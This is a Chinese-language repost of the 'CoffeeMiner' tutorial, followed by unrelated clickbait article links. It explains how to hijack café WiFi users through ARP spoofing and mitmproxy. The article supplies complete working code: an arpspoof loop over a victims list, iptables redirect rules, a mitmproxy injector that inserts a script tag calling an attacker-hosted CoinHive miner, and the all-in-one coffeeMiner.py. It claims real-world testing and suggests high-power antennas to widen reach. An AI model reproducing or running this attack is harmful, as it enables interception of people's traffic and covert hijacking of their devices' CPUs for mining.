写在前面的话

在几周之前，我看到了FB发布的【这篇文章】，这篇文章讲述了黑客利用咖啡店WiFi网络入侵用户设备并实现挖矿的故事，而我个人也认为这是一种实现挖矿攻击的新方法。

本文的目的是为了给大家介绍如何利用中间人攻击（MitM）来向html页面中注入JavaScript代码，然后强制目标设备连接到恶意WiFi网络并为攻击者挖矿。

接下来，我们会使用一个脚本来执行WiFi网络自动化攻击，我们将其成为CoffeeMiner，因为它可以用来对咖啡店的WiFi网络实施攻击。

一、攻击场景

在本文所要介绍的攻击场景中，需要有多台设备接入到WiFi网络，而CoffeeMiner攻击者需要拦截目标用户与路由器之间的网络通信数据。

1.1 场景配置

在真正的攻击场景中，WiFi路由器通常会连接笔记本电脑以及智能手机。我们在真实场景中进行了测试，并且攻击工具可以正常工作。但是在这篇文章中，我们将详细介绍虚拟环境的搭建与配置。

我们将使用VirtualBox来部署我们的虚拟攻击场景。【VirtualBox】

首先，我们需要下载Linux安装镜像，然后安装到VirtualBox虚拟机中，本文将使用Kali Linux镜像。【Kali】

ISO镜像下载完成之后，我们需要准备三台VBox虚拟机，并安装好Linux系统。这三台虚拟机所扮演的角色如下：

-受害者：连接到路由器并浏览一些网页。

-攻击者：运行CoffeeMiner，并执行中间人攻击。

-路由器/网关：跟普通网关功能一样。

攻击开始后，场景如下所示：

每台虚拟机的配置如下：

受害者

网络适配器：

eth0:Host-only Adapter

/etc/network/interfaces:

auto loiface lo inet loopbackauto eth0iface eth0 inet staticaddress 10.0.2.10netmask 255.255.255.0gateway 10.0.2.15攻击者

网络适配器：

eth0:Host-only Adapter

/etc/network/interfaces:

autoloiface lo inet loopbackauto eth0iface eth0 inet staticaddress 10.0.2.20netmask 255.255.255.0gateway 10.0.2.15路由器/网关

网络适配器：

eth0:Bridged Adaptereth1:Host-only Adapter/etc/network/interfaces:auto loiface lo inet loopbackauto eth0iface eth0 inet dhcpauto eth1iface eth1 inet staticaddress 10.0.2.15netmask 255.255.255.0二、CoffeeMiner介绍2.1 ARP欺骗

为了执行ARP欺骗攻击，我们将使用dsniff库：

arpspoof-i interface -t ipVictim ipGatewayarpspoof-i interface -t ipGateway ipVictim2.2 mitmproxy

mitmproxy这款软件工具可以帮我们分析流经主机的通信数据，并允许我们对流量数据进行编辑修改。而在我们的场景中，我们将用它来向html页面中注入JavaScript代码。为了演示方便，我们将在html页面中注入一行代码，而这行html代码将会调用JS挖矿工具：

<

script src

=

"http://httpserverIP:8000/script.js"

>

<

/script

>

2.3 代码注入

当我们拦截下了目标用户的流量之后，我们需要向其中注入脚本代码，这里我们使用的是mitmproxy API来实现：

from bs4

import

BeautifulSoupfrom mitmproxy

import

ctx, http

import

argparseclass Injector:def __init__

(

self, path

)

:self.path

=

pathdef response

(

self, flow: http.HTTPFlow

)

-

>

None:

if

self.path:html

=

BeautifulSoup

(

flow.response.content,

"html.parser"

)

print

(

self.path

)

print

(

flow.response.headers

[

"content-type"

]

)

ifflow.response.headers

[

"content-type"

]

==

"text/html"

:

script

=

html.new_tag

(

"script"

,src

=

self.path,type

=

"application/javascript"

)

html.body.insert

(

0, script

)

flow.response.content

=

str

(

html

)

.encode

(

"utf8"

)

print

(

"Scriptinjected."

)

def start

(

)

:parser

=

argparse.ArgumentParser

(

)

parser.add_argument

(

"path"

,type

=

str

)

args

=

parser.parse_args

(

)

return

Injector

(

args.path

)

2.4 HTTP服务器

注入了html代码之后，它将会调用我们的JavaScript挖矿工具。所以接下来，我们需要在HTTP服务器中托管脚本文件。HTTP服务器需要在攻击者端配置，我们这里使用Python的‘http.server’库：

#!/usr/bin/envpython

impor thttp.server

import

socketserver

import

osPORT

=

8000web_dir

=

os.path.join

(

os.path.dirname

(

__file__

)

,

"miner_script"

)

os.chdir

(

web_dir

)

Handler

=

http.server.SimpleHTTPRequestHandlerhttpd

=

socketserver.TCPServer

((

""

, PORT

)

, Handler

)

print

(

"servingat port"

, PORT

)

httpd.serve_forever

(

)

上述代码可以迅速搭建一台简单的HTTP服务器，并负责向目标用户发送我们的JS挖矿工具。JavaScript脚本存放在/miner_script目录中，本文将使用CoinHive作为JavaScript挖矿工具。

2.5 CoinHive

CoinHive是一种专门挖门罗币（Monero）的JavaScript挖矿工具，它可以直接注入到网站之中，并利用目标设备的CPU算力来挖门罗币（基于CryptoNote协议）。

在我们的实验场景中，我们会将挖矿代码注入到目标用户所请求的每一个HTML页面之中，然后建立持久性的会话并计算哈希（挖门罗币）。

三、脚本代码整合

首先，我们需要配置ip_forwarding和IPTABLES，并将攻击者的设备打造成代理：

echo

1

>

/proc/sys/net/ipv4/ip_forwardiptables-t nat -A POSTROUTING -o eth0 -j MASQUERADEiptables-t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

为了执行ARP欺骗攻击，我们需要准备一份“victims.txt”文件并存储所有的目标用户IP地址。下列Python代码可以帮我们完成IP地址的读取任务：

# get gateway_ip

gateway

=

sys.argv

[

1

]

print

(

"gateway:"

+ gateway

)

# getvictims_ip

victims

=

[

line.rstrip

(

"\n"

)

for

line

in

open

(

"victims.txt"

)

]

print

(

"victims:"

)

print

(

victims

)

# runthe arpspoof for each victim, each one in a new console

for

victim

in

victims:os.system

(

"xterm -e arpspoof -i eth0 -t "

+ victim +

""

+ gateway +

" &"

)

os.system

(

"xterm -e arpspoof -i eth0-t "

+ gateway +

" "

+ victim +

" &"

)

ARP欺骗攻击开始后，我们还需要运行HTTP服务器：

>

python3 httpServer.py

现在我们就可以用injector.py来运行mitmproxy了：

>

mitmdump -s

"injector.py http://httpserverIP:8000/script.js"

3.1 CoffeeMiner+最终的脚本代码

‘coffeeMiner.py’完整的脚本代码如下：

import

os

import

sys

#get gateway_ip (router)

gateway

=

sys.argv

[

1

]

print

(

"gateway:"

+ gateway

)

# get victims_ip

victims

=

[

line.rstrip

(

"\n"

)

for

line

in

open

(

"victims.txt"

)

]

print

(

"victims:"

)

print

(

victims

)

#configure routing (IPTABLES)

os.system

(

"echo1 > /proc/sys/net/ipv4/ip_forward"

)

os.system

(

"iptables-t nat -A POSTROUTING -o eth0 -j MASQUERADE"

)

os.system

(

"iptables-t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port8080"

)

os.system

(

"iptables-t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port8080"

)

# runthe arpspoof for each victim, each one in a new console

for

victim

in

victims:os.system

(

"xterm -e arpspoof -i eth0-t "

+ victim +

" "

+ gateway +

" &"

)

os.system

(

"xterm -e arpspoof -i eth0-t "

+ gateway +

" "

+ victim +

" &"

)

#start the http server for serving the script.js, in a new console

os.system

(

"xterm-hold -e "python3 httpServer.py" &"

)

#start the mitmproxy

os.system

(

"~/.local/bin/mitmdump-s "injector.py http://10.0.2.20:8000/script.js" -T"

)

‘injector.py’脚本代码如下：

from bs4

import

BeautifulSoupfrom mitmproxy

import

ctx, http

import

argparseclass Injector:def __init__

(

self, path

)

:self.path

=

pathdef response

(

self, flow: http.HTTPFlow

)

-

>

None:

if

self.path:html

=

BeautifulSoup

(

flow.response.content,

"html.parser"

)

print

(

self.path

)

print

(

flow.response.headers

[

"content-type"

]

)

ifflow.response.headers

[

"content-type"

]

==

"text/html"

:

print

(

flow.response.headers

[

"content-type"

]

)

script

=

html.new_tag

(

"script"

,src

=

self.path,type

=

"application/javascript"

)

html.body.insert

(

0, script

)

flow.response.content

=

str

(

html

)

.encode

(

"utf8"

)

print

(

"Scriptinjected."

)

def start

(

)

:parser

=

argparse.ArgumentParser

(

)

parser.add_argument

(

"path"

,type

=

str

)

args

=

parser.parse_args

(

)

return

Injector

(

args.path

)

脚本的运行命令如下：

>

python3 coffeeMiner.py RouterIP四、攻击演示

如果我们想要手动实现攻击的话，我们需要按照下图进行配置：

接下来，当ARP欺骗攻击完成之后（并且HTTP服务器和注入代码随时待命），我们就需要让目标用户的设备去浏览一个网页，而目标用户的流量经过攻击者设备时，便会触发代码注入：

此时，当目标用户浏览这个HTML页面时，攻击者所注入的代码将会被运行。

4.1 演示视频

在下面的视频中，我们将演示如何使用coffeeMiner.py脚本来实施完整的攻击。

VirtualBoxDemo：

视频地址：http://www.youtube.com/watch?v=wmYJ6Z4LoCA

WiFi网络以及笔记本电脑Demo：

视频地址：http://www.youtube.com/watch?v=-TnzGLUD0DU

总结

正如本文所介绍的那样，攻击者可以轻松地对一个WiFi网络进行自动化攻击，并且还可以通过WiFi网络来让受害者的计算设备帮助自己进行挖矿。在真实的攻击场景中，如果配合高功率WiFi天线的话，攻击的覆盖范围可能还会更大。

本文中完整的项目代码可以从我们的GitHub代码库中获取，点击阅读原文获取GitHub链接！

·

 END ·

文字网络，如涉及侵权请联系我们马上处理

• 十二星座如何应对七大姑八大姨之新年大忠告
• 一个让人爱到深处自然烦，烦到深处自然爱的星座
• 原来避孕药有这5个用处!很多女人一个也不知道
• 爱一个人最正确的方式
• 男人放不下一个女人，往往会有这三种表现！
• 一个是皇帝一个是国王，为什么李世民死了要下地狱，他却不用
• 这个问题令历代开国帝王头疼，光武帝刘秀如何顺利解决？
• 看看我们历史上三个终结乱世的王朝？其中一个被公认为智障王朝
• 老公，你家这么多穷亲戚，我一个也不想伺候！
• 心理测试:2018年你的爱情如何?测测你的桃花运程吧!